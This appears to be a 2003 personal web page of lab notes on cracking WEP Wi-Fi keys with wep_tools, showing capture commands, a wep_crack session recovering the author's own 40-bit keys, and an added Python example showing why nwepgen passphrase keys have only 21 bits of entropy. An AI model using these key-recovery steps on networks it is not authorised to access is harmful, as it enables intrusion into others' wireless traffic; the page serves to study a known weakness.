New experiments.

I've been using wep_tools to crack observed Wi-Fi traffic while the interface is in promiscuous mode. An interesting article describing some internals of this program is unfortunately in PowerPoint, but you can translate it into HTML with Google.

wep_tools is a set of tools containing:

wep_crack is supposed to use a capture file generated by prismdump, but that program freezes in an infinite wait in recv(), so the capture file was generated instead with 'tcpdump -i wlan0 -w capture.log -c 100 -s 0'.

The frames have to be identified by the pcap link-layer type as DLT_IEEE802_11 and not as DLT_PRISM_HEADER (see /usr/include/pcap/net/bpf.h), so verify that you pass the option 'prismheader=false' when setting promiscuous mode with wlanctl-ng.

I also set 'keepwepflags=false' to get valid Data packets when reloading the capture file in ethereal: ethereal -r capture.log

Test with WEP128

The length of the WEP key to search for is set with the '-s' (strong) flag. With WEP40 you can try the brute-force algorithm (-b); with WEP128 you must use a dictionary. The algorithm used to derive the WEP key from a dictionary string is given in wep.c and appears to differ from the one used by 3Com on our access point, so the dictionary search is unusable if the WEP key was generated on 3Com equipment [TODO: find out whether this string-to-WEP-key conversion algorithm is available somewhere, or has been reverse engineered].

Test with WEP40

The cracking algorithm assumes that the four 5-byte keys are generated from a single seed, iterates over this seed (0x1000000 possible values, excluding those with (x & 0x808080) != 0), generates the keys, and tests them against a given packet. This algorithm is fast (1 or 2 minutes), but misses my WEP key, probably because of an unusual algorithm used by 3Com. An exhaustive search of a single 40-bit key would take approximately 110 days on a regular PC.

If you use the nwepgen key generator provided in the linux-wlan-ng package, wep_crack finds your key in under a minute:

[root@bonobo linux-wlan-ng-0.1.16-pre8]# ./src/nwepgen/nwepgen toto 5

You manually enter the first hexadecimal key into your access point.

[root@bonobo wep_tools]# ./wep_crack -b capture.log
success: seed 0x00746f74,  [generated by AAAa5.5a]
wep key 1: c0 b6 76 bc 08
wep key 2: ba 15 22 4c cb
wep key 3: 86 1b bb ac 98
wep key 4: 0c b8 86 dc 0d

As a bonus, the algorithm gives you one valid string (among others) that generates these four WEP keys.
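The two observations above, the 0x1000000-minus-0x808080 seed space and the fact that a string other than the one you typed ("AAAa5.5a" instead of "toto") yields the very same keys, can be reproduced with the following Python example. It is an added example, not code from wep_tools or linux-wlan-ng: it reimplements the passphrase generator that nwepgen is assumed to use (the passphrase bytes XOR-folded into a 4-byte seed, then a 32-bit linear congruential generator with multiplier 0x343FD and increment 0x269EC3, with bits 16..23 of each state taken as the next key byte, the four keys being consecutive slices of that byte stream). The output is checked against the seed and key 1 printed above; the constants and the folding scheme are assumptions that this check supports. The point for anyone administering such equipment: a key derived from a passphrase has the generator's entropy, not the passphrase's, and here that is 21 bits.

```python
"""Why nwepgen-style 40-bit WEP keys are found in under a minute.

Added example, not code from wep_tools or linux-wlan-ng. Reimplements the
passphrase-to-key generator nwepgen is assumed to use and shows why the
effective seed space is only 2**21. Python ints are unbounded, so every
LCG step is masked to 32 bits to mimic the C int arithmetic.
"""

LCG_MULT = 0x343FD    # assumed LCG multiplier (checked against the page's key 1)
LCG_INC = 0x269EC3    # assumed LCG increment
MASK32 = 0xFFFFFFFF
# Seed bits that can actually influence the generated keys (see canonical_seed).
EFFECTIVE_SEED_MASK = 0x7F7F7F


def passphrase_seed(passphrase: str) -> int:
    """Fold the passphrase into a 32-bit seed: byte i is XORed into seed byte i % 4."""
    seed_bytes = [0, 0, 0, 0]
    for i, b in enumerate(passphrase.encode("ascii")):
        seed_bytes[i % 4] ^= b
    return (seed_bytes[0]
            | seed_bytes[1] << 8
            | seed_bytes[2] << 16
            | seed_bytes[3] << 24)


def generate_keys(seed: int, key_len: int = 5, num_keys: int = 4) -> list[bytes]:
    """Run the LCG from `seed` and cut its byte stream into num_keys keys of key_len bytes."""
    state = seed & MASK32
    stream = bytearray()
    for _ in range(key_len * num_keys):
        state = (state * LCG_MULT + LCG_INC) & MASK32
        stream.append((state >> 16) & 0xFF)  # only bits 16..23 of the state reach the key
    return [bytes(stream[i * key_len:(i + 1) * key_len]) for i in range(num_keys)]


def keys_from_passphrase(passphrase: str) -> list[bytes]:
    """Keys 1..4 exactly as a nwepgen-style generator would print them."""
    return generate_keys(passphrase_seed(passphrase))


def canonical_seed(seed: int) -> int:
    """Drop the seed bits that cannot change the generated keys.

    In a multiply-add modulo 2**32, bit k of the state only feeds bits >= k of
    the next state, and the key byte is taken from bits 16..23, so seed bits
    24..31 never reach the output. With ASCII passphrases bit 7 of every input
    byte is clear, so bit 7 of each remaining seed byte (mask 0x808080) is
    always 0 as well. Two passphrases with the same canonical seed collide.
    """
    return seed & EFFECTIVE_SEED_MASK


def effective_seed_space() -> int:
    """Number of distinct key sets an ASCII passphrase can produce."""
    return 1 << bin(EFFECTIVE_SEED_MASK).count("1")   # 21 usable bits


def search_reduction_factor() -> int:
    """How much smaller the passphrase-derived space is than a full 40-bit key space."""
    return (1 << 40) // effective_seed_space()


if __name__ == "__main__":
    for phrase in ("toto", "AAAa5.5a"):
        print(f"{phrase!r}: seed 0x{passphrase_seed(phrase):08x}, "
              f"canonical 0x{canonical_seed(passphrase_seed(phrase)):06x}")
        for n, key in enumerate(keys_from_passphrase(phrase), 1):
            print(f"  wep key {n}: {key.hex(' ')}")
    print(f"effective seeds: {effective_seed_space()} "
          f"({search_reduction_factor()}x fewer than 2**40 keys)")
```

Running the block prints the same four keys for "toto" and for "AAAa5.5a", which is exactly why wep_crack reports the second string: both fold to canonical seed 0x746f74, and only 2,097,152 such seeds exist, 524,288 times fewer than the 2**40 keys an exhaustive search would have to cover.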


$Id: wireless3.html,v 1.3 2003/10/19 20:36:04 bellet Exp $